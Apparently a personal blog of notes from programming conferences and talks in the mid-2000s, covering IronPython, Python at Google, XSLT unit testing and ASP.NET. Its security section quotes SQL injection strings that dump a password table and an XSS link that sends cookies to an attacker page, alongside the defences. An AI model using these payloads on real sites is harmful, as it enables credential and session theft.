ACCU Conference 2005

Introduction

I attended six presentations at the ACCU Conference this year:

  1. IronPython – Python for .NET (Microsoft)
  2. Python at Google (Greg Stein)
  3. C++ and the CLR (Microsoft)
  4. Unit Testing XSLT (Jez Higgins)
  5. Modern 3-Tier Architectures (T-Mobile)
  6. .TEST Testing Framework (Parasoft)

I also made some random observations.

IronPython – Python for .NET

The experience of seeing Python being implemented on the CLR (by Jim Hugunin) has influence Microsoft’s design of .NET 2.0 – better support for dynamic languages, generative programming, dynamic classes, and so on, are all coming to .NET 2.0. In fact, so much so, that Microsoft head-hunted Hugunin last year.

IronPython targets the CLI, the open-standard implementation of the CLR, so it runs on Mono and other, non-Microsoft platforms. We saw a live demmonstration of IronPython importing classes written in C# from an Assembly, and calling methods and events on those classes. Even the IronPython source code itself if a Visual Studio project!

Python at Google

Greg Stein has worked for several major organisations, including Microsoft, Apache Foundation and now Google. He revealed that Python is fundamental to Google, and is used not only in back-end management, but as the main language for both Google Groups (http://groups.google.com/) and Google Code (http://code.google.com/). Some of the other areas for which Google uses Python include:

  • Wrappers for Version Control systems – to enforce check-in rules etc.
  • Build system – entirely in Python
  • Packaging of applications prior to deployment
  • Deployment to web-farms and clusters
  • Monitoring of servers (CPU Load, fan speed, NIC utilization, etc.)
  • Auto-restarting of applications
  • Log reporting and analysis

He referred to Python a the “special sauce” which makes a company more ‘tasty’ or appealing than another. Because Python lends itself to readability and maintainability, it also allows rapid changes to code, following shifting requirements. C and C++ tend to be used (in Google) only for specialist, speed-critical tasks. Otherwise, Python (or sometimes Java) is used – it’s simpler and quicker to write, and easier to modify.

Software Development

Greg made some interesting comments about software development. At Google, the typical project is “3 people, 3 months”, forcing many small applications to co-operate, rather than having just a single monolithic blob, aiding scalablility. Every Google developer has 20% of their time to “play” with their own ideas. Google Maps, and the Google Toolbar both started off with employees tinkering with code in the 20% “spare” time.

Employees are also encouraged to submit patches to any part of the Code Base, not just that for their project. THis more open approach contrasts with the style at Microsoft (apparently), where teams have access only to the source for their project and no other. Greg argues that this openness explains why Google innovates so well.

As an aside, he said that he has a machine running Unit Tests continuously on the latest code, so that as soon as code breaks, they are notified ;o)

C++ and the CLR

The bod from Redmond pitched C++ as the Systems programming language for the foreseeable future, underpinning the .NET Framework, and allowing developers to achieve applications of the highest performance.

The C++ compiler can compile manages code directly to a native platform executable, and allows free mixing of Managed and Unmanaged code throughout an application. In this way, the .NET Framework is treated as just another class library, which can be loaded on demand.

Performance can thus be highly tuned. We were shown a demo of Doom 2 running on the CLR, and running faster than the native code, due to the highly optimized code produced by the C++ compiler. For example, in Managed C++, when a variable goes out of scope, it is automatically set to null by the compiler, making the job of the Garbage Collector much easier. In C#, by contrast, this does not happen automatically, so that objects marked for GC may sit in the GC queue much longer, using up resources.

The Sampling Profiler was recommended as a good tool to use when beginning investigations into performance problems. No code changes are required, and it can be used on live systems with practially no detrimental effects to application speed.

Unit Testing XSLT

XSLT is a fully-specified programming language; it is Turing Complete. However, unlike most programming languages, it has very few testing and debugging tools. Often, in a mixed system of Java/C# + XML + HTML, the XSLT is something of an unknown: output must be inspected visually, not programatically, to attempt to verify correctness.

Jez Higgins demonstrated some simple code (written in XSLT) allow Unit-Testing of XSLT.

Basically, like any Unit Testing, you define expected output data for given input data, and test that the software (here, the XSLT transform) produces the correct output. There is an Open Source project called XSLTUnit (http://xsltunit.org/), which, although really proof-of-concept, is stable and useful. Starting with this framework, Jez added extra functionality so that Unit Testing of XSLT files can be included as part of an JUnit test script [the same could be done in other languages, e.g. C# and NUnit].

The XML looked intially complicated, but the scheme is actually remarkable simple:

    1. Define input data for a given XSLT file (in XML).
    2. Define expected outputs for the transform (in XML).*
    3. Write a special XSLT file which, upon transform, will produce Java code for each test case. The Java will inspect the XML output file.
    4. Write a small amount of Java to load in the XSLT and XML files, and perform the transformations.
    5. Using Ant and JUnit, compile and run the Java code generated by the XSLT to test the output data.

*Note: output from transform must be in XML

The beauty of this approach is that existing standard Unit Test tools (JUnit/NUnit/etc.) can be used to test XSLT! XSLT is used to generate code required to test XSLT itself; Java (or C#, etc.) is used dynamically as “scaffolding” to make use of standard testing frameworks.

Example:

import junit.framework.*; public class extends TestCase { public (String name) { super(name); } public static Test suite() { return new TestSuite(.class); } } // class public void () { Helper.runTest( “”, “”, “”); }

Once the initial test definitions are written, no more work is needed – no Java, no editing XML configuration files. Crucially, the fact that test definaitions are defined in XSLT allows non-programmers to write the Test definitions, in addition to the XSLT itself; this follows the standard pattern of Unit Testing, where the implementer also writes the Unit Tests.

In terms of the complications introduced by complex, once-unverifiable XSLT, this scheme could bring massive improvements.

Modern 3-Tier Architectures

The most salient point made by Nico Josuttis was with regard to Project Management: that in a large n-tier system, the architecture will change over its lifetime, and trying to lock down the technical design is recipe for disaster. Clients like to think that the architecture remains the same, but – even if that is what they are led to believe – developers must be willing to refactor or completely redesign.

The speaker argued that the back-end (database layer) should maintain data consistency itself, and therefore perform checks for:

  • Authentification (who am I)
  • Authorization (what I am allowed to do)
  • Validation (does the data make sense)

There was lots of discussion of the granularity of security and validation, and where exactly this should take place. Most people agreed that having two separate levels of validation is essential. This granularity issue was exemplified by comments from some people who work for large telecoms comapnies, whose databases contain thousands and (soon) millions of logins – one for each customer – not just a few logins used by the application for all connections, irrespective of the customer. This clearly has performance issues.

Project Management

Nico then spoke about development procedures within a large company, T-Mobile, where (typically) software is released every 3 months; they have 6 weeks development time, followed by 6 weeks of regression testing – a 50-50 split between coding and testing!

As for releasing software, he reported that in his experience, nightly builds are essential (echoing Greg Stein’s comments about the continuously running build machine). He suggested to plan for ten per cent of development effort to go into releasing software (build, deploy, integration, etc.).

He was also scathing about UML, MDA, and other “fad” techniques, at least as far as whole projects go. For small tasks they are okay, but a project driven from these modelling approaches is doomed, according to Josuttis.

Parasoft .TEST Testing Framework

Parasoft .TEST is a testing tool for .NET code. It has Visual Studio integration, but can also be run as a stand-alone app (for the QA people) and from the command-line for build process integration.

It addresses three main areas: Coding Standards, QA testing, and Unit Testing. For the latter, it integrates with NUnit, allowing existing Unit tests to be run as part of the testing cycle.

It works by inspecting the ILASM in existing Assemblies, so can work with Assemblies created with any .NET language. It can automatically generate NUnit test harness projects for the assembly and (with the VS-Plugin version) automatically add these to the Solution. This is probably the biggest bonus – all the tedious Unit Test scaffolding is done for you – all the developer needs to do is to fill in the implementation of each generated test. This then addresses one of the chief complaints of people using Unit Testing; namely, that it takes a long time to code up all the Test classes.

In addition, the suite generates internal Unit Tests for common boundary conditions (null reference, index out of bounds, etc., etc.) across all or part of the Assembly/Assemblies under test.

.TEST ships with about 250 pre-defined Coding Standards, but others can be defined by non-programmers, so that (for example) Security and Performance QA issues can be addressed at the code level, and as part of the testing cycle.

It was pretty impressive; seemingly all the gain and none of the pain of Unit Testing.

Other random observations

Python

There are Python Meetups in London (Putney); the UK Python mailing list is uk-python@python.org.

Version Control

Greg Stein said he wants to convert Google from Perforce to Subversion for Source Code Control. Now, he might be a bit biased (he helped develop SVN), but if SVN is ready for Google, it’s ready for anyone, I reckon!

Sun Tech Days 2004

I attended the Sun Tech Days in London last week. There was a lot of marketing schmooze, and some pretty dull and dry Java implementation stuff, but it was certainly worth going. Heh, it was bizarre to witness the hand-wringing over Microsoft technologies (particularly .NET) by many of the speakers; they spoke as if apologising for a ill-behaved child! Three sessions were interesting to varying degrees: Emerging Web Services Standards, Web Services CodeCamp, and J2EE Transformation Patterns

Emerging Web Services Standards

Amidst all the hyperbole surrounding Web Services, it is important to define what a Web Service actually is. In its simplest form, a Web Service is an Interprocess Communication mechanism: even the name is a little misleading, as the ‘Web’ as most people know it need not enter into the arena at all. Even the underlying transport need not be HTTP; Web Services can leverage* a variety of protocols, including SMTP, FTP and even WAP or LDAP.

Web Services thus can offer similar services to existing IPC platforms, such as DCOM and CORBA, but — crucially — with many, many benefits over those technologies. The pairing of Web Services with XML allows the provision of services to clients with widely varying requirements; clients can extract from the XML only those operations in which they are interested, without being burdened with the requirement to implement a raft of irrelevant features. In other words, it is Clients which determine the level of service, not the Servers. DCOM/CORBA etc. require the service Endpoints to be fixed and known beforehand; Web Services + XML allow dynamic discovery of Endpoints and services.

There was a brief discussion of Web Services for Remote Portals (WSRP), and how they can be used to abstract the data and functionality provided by a Web Service from the necessary data presentation: [WSRP] aims to allow for interoperability between different kinds of intermediary applications and visual, user-facing web services. Web Services Distributed Management (WSDM) is a little like a meta-WSDL, and allows monitoring and management of Web Services, in a somewhat Aspect-Oriented manner.

The final section of the seminar was devoted to Security. For Web Services, it is not enough to ensure Transport-level security (e.g. HTTPS); rather, within an interconnected group of Web Services, some form of “federated” identification-based security is necessary, probably with “single sign-on” authentication, and trust Relationships. There is currently no standard available for this type of security, although the OASIS group is working on an implementation using SAML.

Web Services CodeCamp

A Web Service on the J2EE platform were introduced as: a set of endpoints or ports operating on messages, running within a container, and described entirely by a WSDL document. This implies that a typical Java Web Service will be implemented as a Component, and executed by an Application Server within a Container, in much the smae way that EJBs are handled. Two different Endpoint implementations are available: stateful (using Servlets and JAX/RPC) and stateless (using ‘Session Beans’** and EJBs). JAX/RPC essentially specifies how the XML-to-Java mapping is to be achieved, including the WSDL definition. This mapping includes data types, message handlers, and interface stubs; in fact, the mapping of many Java constructs to WSDL is quite natural:

WSDL to Java mappings

Defining a Web Service interface for JAX/RPC is very similar to defining the remote interface of EJBs:

package hello;

import java.rmi.Remote;
import java.rmi.RemoteException;

public interface HelloIF extends Remote {
public String sayHello(String s) throws RemoteException;
}

At this point, it became apparent that deploying a Java-based web service is actually non-trivial. Unlike the xcopy style deployment model of ASP.NET, there is a variety of TLAs to contend with when using J2EE. Tools like Sun Studio ONE (or whatever it is now called) can package Java Web Services automatically, as one would expect.

There are three different models for programming under JAX/RPC:

  1. Stub-based – static, with both endpoints (WSDL, stub) defined at compile time
  2. Dynamic proxy – WSDL exists at compile time, but stub (implemention) created at runtime
  3. Dynamic invocation interface – both endpoints created at runtime

Naturally, this order also corresponds to both the order of complexity in programming, and flexibility for applications.

JAX/RPC represents a tightly-coupled programming model, where — irrespective of endpoint resolution — messages are exchanged ‘immediately’. The Document-Driven (stateless) programming model, however, provides for more loosely-coupled application communication, typically between peers rather than the implicit client-server arrangement of RPC. Data is exchanged by using XML documents (on the wire) rather than .

J2EE Transformation Patterns

This session was essentially an advertisement for OptimalJ, although it also provided a useful overview of Model Driven Architecture. The case for code generation tools like OptimalJ was made by the speaker thus: given a single requirements document and ten competant programmers, how many distinct implementations can you expect? The answer, of course, is ten distinct implementations – one for each coder. Now throw some less experienced coders into the mix, or someone whose first language is not the same as that used int he requirements document, and the validity of the implementations begins to disintegrate. If the requirements of the project change part-way through — as experience has shown time after time that they will — then how is it possible to prove or have any idea that the code is a valid implementation of the (new) requirements?

Many modelling tools attempt to ’round-trip’ between Requirements, Model, and Code. Transformation Patterns, on the other hand, are uni-directional: from Requirements to Model, and then from Model to Code. Code is thus always the output or goal of the process, never one of the inputs to it. This leads to a fill-in-the-blanks coding strategy; however, code is never deleted by the transformation procedure, leaving the programmer in control once the stubs have been generated.

* isn’t this word truly awful?
** another terrible name

Scott Guthrie on ASP.NET

Last Monday I went to hear Scott Guthrie speak on ASP.NET. What follows is a précis of the session. The slides are online (under ASP.NET Presentation in Reading, England).

Introduction

First impressions were good: as a speaker Guthrie was very clear and measured, and flexible yet firm with questions. The talk assumed no prior knowledge of the ASP.NET architecture, so started from a basic discussion of embedded script tags () found in most dynamic content framworks (‘vanilla’ ASP/PHP/JSP etc.). By the end of the session, we had covered: the ASP.NET Server Control model; targetting of mobile devices; form validation; Web Services; Output Caching; Session State; and site security, including SQL Injection and XSS attacks.

Spaghetti

The existing model of dynamic (on-the-fly) HTML content generation as used with ASP/PHP/JSP etc. tends to use a script interpreter to parse server directives/commands embedded in the HTML document. This can lead to a mix of Code and Content which is very difficult to manage and understand. ASP.NET attempts to address this “spaghetti code” problem by proving the means to separate Code and Content. In addition, ASP.NET does not use a scripting engine, but rather compiles all code fragments, resulting in faster execution, especially when combined with Caching. In fact, the code to implement a particular feature need not live in the same file as the markup at all, but in a separate file using a feature called CodeBehind; the code lives “behind” the page, as it were.

Deployment

To address the need for seamless ‘zero-downtime’ udpates, ASP.NET uses an ‘xcopy’ deployment model, meaning that deployment is designed to be as simple as copying across new files to the webserver: no configuration tools to run nor locked DLLs to contend with. No doubt there are complications, but the promise is certainly welcome; with Assemblies and Side-By-Side execution, the whole .NET Framework appears to offer a similar promise too.

Server Controls

The ASP.NET coding model seems to have been designed to mimic the familiar Drag-n-Drop (Delphi/VB) style of visual programming, with UI elements exposed as objects with properties, methods and events. This is clearly quite different from the features provided by the underlying HTML, but no more so than the Delphi approach is (thankfully) different from the underlying Win32 API: in each case a flat, procedural style of programming is hidden by an Object-Oriented wrapper. This lets the programmer concentrate on good design and coding without needing to be concerned about ‘plumbing’.
In an ASP.NET file (.aspx) there may be little of no HTML at all, because the ASP.NET runtime produces HTML as output, having compiled and run the code contained in (or referenced by) the page. By sending only HTML back to the browser, ASP.NET can guarantee a much wider range of targets than if, say, some functionality were implemented as ActiveX Controls. Thus, not only is it possible to separate the location of the Content from the Code, but the implementation detail (plumbing) is conceptually separated. This said, there are two different models for code in ASP.NET pages: The CodeBehind model (used by Visual Studio) and Single-file (as used by the free WebMatrix environment). The end effect is broadly the same wherever the code lies, with compiled code running at the server to generate HTML from the Controls specified in the .aspx file.
To learn about ASP.NET programming, WebMatrix was recommended, and it certainly allows you to get ‘up and running’ much more quickly than with VS.NET, largely because it has a built-in Web Server (bound by default to localhost for security reasons), so changes to files can be tested immediately rather than exporting the files to the IIS or Apache tree. The following images show ASP.NET development under WebMatrix.

Set Properties of Form Controls
Set Properties of Form Controls
Set Properties of Form Controls

The runat=”server” attribute of the different Controls on the form indicates to ASP.NET that event handling and state management code should be generated for those Controls. Any existing HTML control can be attributed in this way; a wider range of ASP.NET Controls uses the element, and these Controls are always run at the Server. The code is quite simple:

<html>
<head>
</head>
<body>
    <form runat="server">
        &nbsp;&nbsp;
        <p>
            <asp:CheckBoxList id="CheckBoxList1" runat="server">
                <asp:ListItem Value="JubJub Bird">JubJub Bird</asp:ListItem>
                <asp:ListItem Value="Bandersnatch">Bandersnatch</asp:ListItem>
            </asp:CheckBoxList>
        </p>
        <p>
            <asp:Calendar id="Calendar1" runat="server" Font-Names="Verdana,Helvetica">
                <DayStyle backcolor="#FFE0C0"></DayStyle>
                <DayHeaderStyle font-bold="True" forecolor="Maroon"></DayHeaderStyle>
            </asp:Calendar>
        </p>
    </form>
</body>
</html>

The code to hook events from different elements of the page is handled automatically by ASP.NET as can be seen below. The HTML generated (together with JavaScript for non-elements) is comparitavely complex:

<body>
    <form name="_ctl0" method="post" action="TestClass.aspx" id="_ctl0">
<input type="hidden" name="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" value="dDwxODgxMjI4MTczOztsPENoZWNrQm94TGlzdDE6MDtDaGVjav5uV2zMZzhwmN4/UeXbAAA04=" />

<script language="javascript">
<!--
 function __doPostBack(eventTarget, eventArgument) {
  var theform;
  if (window.navigator.appName.toLowerCase().indexOf("netscape") > -1) {
   theform = document.forms["_ctl0"];
  }
  else {
   theform = document._ctl0;
  }
  theform.__EVENTTARGET.value = eventTarget.split("$").join(":");
  theform.__EVENTARGUMENT.value = eventArgument;
  theform.submit();
 }
// -- >
</script>

        &nbsp;&nbsp;
        <p>
            <table id="CheckBoxList1" border="0">
 <tr>
  <td><input id="CheckBoxList1_0" type="checkbox" name="CheckBoxList1:0" /><label for="CheckBoxList1_0">JubJub Bird</label></td>
 </tr><tr>
  <td><input id="CheckBoxList1_1" type="checkbox" name="CheckBoxList1:1" /><label for="CheckBoxList1_1">Bandersnatch</label></td>
 </tr>
</table>
        </p>
        <p>
            <table id="Calendar1" cellspacing="0" cellpadding="2" border="0" style="border-width:1px;border-style:solid;font-family:Verdana,Helvetica;border-collapse:collapse;">
 <tr><td colspan="7" style="background-color:Silver;"><table cellspacing="0" border="0" style="font-family:Verdana,Helvetica;width:100%;border-collapse:collapse;">
  <tr><td style="width:15%;"><a href="javascript:__doPostBack('Calendar1','V1461')" style="color:Black">&lt;</a></td><td align="Center" style="width:70%;">February 2004</td><td align="Right" style="width:15%;"><a href="javascript:__doPostBack('Calendar1','V1521')" style="color:Black">&gt;</a></td></tr>

Notice the __doPostBack event hooked onto the different cells of the Calendar: the programmer had to write no such event-handling code manually – it was all generated by ASP.NET before pushing the HTML to the browser. There is automatic handling of differences in DOM support between Internet Explorer and Netscape, and a hidden field named ‘__VIEWSTATE’ contains information about the state of the form for when the form is submitted; ASP.NET does not maintain state between page submissions except by the use of these hidden fields.

Styles and Templates

Basic styles of controls can be set at Design-Time using the properties panel in Visual Studio. To apply a collection of styles of property settings across multiple controls, one either must edit the changes on each control manually, or create a User Control (there a re some fine distinctions between Server Controls and User Controls). There is, however, an alternative to property setting: ASP Templates. It is possible to specify (either hard-coded or programmatically) a template for presenting data. Using a DataList (not a DataGrid), formatting can be applied to each logical element in the data collection. That element could be in effect a section of HTML pertaining to a single record in a data set, showing, for example, the title, author and description of a book, along with a picture of the cover.

Mobile Devices

Many mobile devices have extremely limited rendering and display capabilities, and most read markup in WML format, a flavour of XML. A WML document is typically divided into one or more subsections or “Cards”. This approach is sufficiently different from the HTML approach (dealing with the whole document at once) that ASP.NET has amrkup specially for mobile devices. The tag is broadly equivilent to the tag for HTML; Controls described with this element are rendered at the server, which pushes WML to the mobile device. One thing not covered by the speaker was the availability of a mechanism to produce ‘cut-down’ markup for low-end/downlevel clients, or clients with special requirements, such as screen readers for the visually impaired. I would guess that some sort of StyleSheet switching based on the UserAgent string may be a way to go, combined with measures to ensure that all elements contain useful descriptive text (e.g. the alt text property of the img tag).


Simple WebServices seem easy to implement with .NET: decorating a class method with the [WebMethod] attribute is all that needs to be done. Use of a WebService proxy helps to abstract the code.

Validation

Validation is best performed at BOTH the client AND the server. Validation on the client prevents unnecessary calls to the server: if bad user input can be caught early, bandwidth and time are both saved. However, even if client-side validation succeeds, the server should still validate; because the client-side validation code runs as javascript, there is no guarantee that it has been executed before the form is sent to the server (users may have Javascript turned off, etc.). If the user has Javascript enbled, she sees the page update as she changes the fields on the form, providing a richer user experience.CachingThe ASP.NET caching mechanism is powerful and can greatly improve server performance. Whole pages, page fragments and user-specific data can be distinguished and cached separately. The term Output Cache is used because the cache is downstream from the ASP HTML generation engine: it is on the “output” side. Caching can be tied to particular page parameters, so that fine-grained control over page data freshness can be maintained. For example: two separate requests arrive for a page, specifying the same parameters; the first request is served by creating the page, but the second is served from the cache. The varying longevity of data stored in Databases can thus be addressed by specifying different timeout periods for different parts of the page: page hit statistics for the past month can be cached for weeks, whereas (say) “current online users” would have a much shorter cache timeout. The Web Application Stress Tool helps test caching.

Session State

There are two options for stateful browsing sessions under ASP.NET: Cookies and Cookieless. With Cookies, the Session ID is stored on the client, whereas Cookieless mode tracks the Session ID via a special URL string. In both cases, all other state information is stored on the server, although this data can actually be stored on a machine separate to the webserver (i.e. out-of-process). This is achieved using the output_state service: net start output_state is the command to turn this on. State can also be stored in a SQL server. The default is to store state In-Process.
This transparency of state storage enables web farm scenarios and increased reliability. Pages can be personalised using the Session State information, but only those parts of the page which are specific to a particular session need to created afresh; the common parts can be retrieved from the Output Cache – see Caching above.

Security

The two types of attacks covered by Guthrie were SQL Injection attacks and Cross-Site Scripting (XSS) attacks.

SQL Injection

SQL Injection vulnerabilities are not specific to any particular programming language or server platform, but rely on naive SQL command construction by the programmer, and the fact that SQL commands can be concatenated very easily. Any unfiltered user input is essentially dangerous.In the example above, the line marked “!!! DANGER !!!” shows how SQL could be injected by an attacker into the database query. If the attacker includes special characters like . (period), ‘ (comma), etc., as follows:

  • Attempt to return other columns in the table: a’ union select 1, 2, 3;–
  • Check and see if a priveledged account is being used: 1′ union select dbid, name, filename, 3 from master..sysdatabases;–
  • Dump Password Table: 1′ union select fullname, emailaddress, password, 3 from commerce..customers;–

In each case, the ‘ terminates the first part of the query, which is then compounded with another query, which can be as destructive or intrusive as possible! The solution is to parameterise all SQL input, using the “@parameter” notation; the line Dim param As New SqlParameter(“@category”, SqlDbType.VarChar) defines a parameter “@category” in which will be placed the text entered by the user. This text can be validated separately by the ASP.NET engine before being executed as SQL. Use of Stored Procedures can also mitigate SQL Injection attacks.

XSS attacks

XSS attacks hijack unfiltered input echoed to a page by the webserver, often using query strings in URLs. The following code demonstrates this:

<a href="http://.../Search.aspx?Search=document.location.replace('http://localhost/EvilPage.aspx?Cookie=‘ + document.cookie);">

The naive search page takes whatever is passed in the query string for the “Search” parameter and processes it directly. This means that the -tagged code will execute, and the attacker (in this case) steals the cookie generated by the search page. To avoid these attacks, always validate input, and reject unwanted embedded tags. Also, HTML-encode input strings, so that “<script>” becomes “&lt;script&gt;”. In ASP.NET, use Server.HtmlEncodeto achieve this.

Where code must survive for 30 years

Interesting conversation with a guy on the coach to London on Saturday, writing distributed middleware for Rutherford. Because he works in an environment where code must survive for 30 years, it must be robust, non-brittle, simple enough for new team members to mod without the author being present (or even alive…). Some interesting points were:

  • always wrap interfaces – assume that someone else’s interface will be changed at some point in the future (against good practise) by wrapping the interface in a layer of your own. This way, your code is independent of the details of the interface and instead forces you to think about making it implement the functionality of the interface. Obviously, in large projects with changing workforce etc., this is particularly important, but – thinking about it – I have already implemented this ‘interface hiding’ in my own code. The LinearFit routine was originally lifted straight from Numerical Recipies and so pretty nasty. I left the putrid NR interface available as a wrapper (so old code wouldn’t break), but reimplemented the guts with OO using stuff from TChart, and generalised the OO interface to be more useful. It’s acually a pretty good discipline to work to an interface, and when you can actually add functionality on the side, then it rather proves the utility of interfaces.
  • Delphi is great – shame it’s dying – having used C and C++ for major dev work, the guy seemed to wholly appreciate the benefits of Delphi. I don’t give a shit about allocating strings, for fuck sake; I just want to use them. C encourages lazy programming… was a view I’d entirely agree with (all those ‘unchecked buffers’ in webservers? 98% C code, you can bet). It’s difficult to verify the ‘dying’ bit. He said that something like 70% of all UK database infrastructure runs on Delphi, the skills are limited to x86 platforms. If only Borland would release DCC32.exe for PPC or Sparc. I guess they should have done that a while ago, because x86 seems to be the way forward now, but they are seen as Wintel-only. Kylix is dog-slow for UI stuff, too, apparently
  • investigate Python – an interesting one, because Phil and others have said the same. Python can run code as interpreted or native compiled, is modular, and can easily be used as a scripting langauge. It has dynamic typing (a la RTTI), classes, exceptions, etc. so is much more friendly than VBScript and friends. Check this out:

    Strings can be concatenated (glued together) with the + operator, and repeated with *:

     >>> word = 'Help' + 'A'
     >>> word
     'HelpA'
     >>> '<' + word*5 + '>'
     '<HelpAHelpAHelpAHelpAHelpA>'

Also mentioned how dire Motif is: apparently, with two TreeView-type widgets on a form, Motif cannot tell which one was clicked. It can tell you which node was hit, but not the owner. Solution? Two separate applications…